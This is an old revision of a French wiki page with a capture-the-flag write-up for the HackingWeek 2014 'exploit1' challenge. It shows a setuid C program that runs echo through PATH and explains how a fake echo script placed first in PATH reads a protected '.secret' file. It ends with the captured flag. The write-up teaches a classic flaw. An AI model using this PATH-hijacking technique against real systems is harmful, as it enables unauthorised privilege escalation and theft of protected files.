Outils d'utilisateurs
hackingweek_2014:exploit:exploit1
Ceci est une ancienne révision du document !
Source :
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main(){
gid_t gid = getegid();
uid_t uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/usr/bin/env echo Find the flaw!");
return EXIT_SUCCESS;
}
la commande system() appelle echo sans son path absolu, mais en se basant sur la variable d'environnement PATH. Il faut donc redéfinir la commande (ex : /tmp/echo)
#! /bin/bash cat /home/exploit-1/.secret
Puis, on ajoute son chemin dans le PATH de l'environnement :
$ export PATH=/tmp/echo:$PATH
./vulnerable eg3fa3Eing
hackingweek_2014/exploit/exploit1.1393807251.txt.gz · Dernière modification: 2017/04/09 15:33 (modification externe)
Sauf mention contraire, le contenu de ce wiki est placé sous la licence suivante : CC Attribution-Share Alike 3.0 Unported
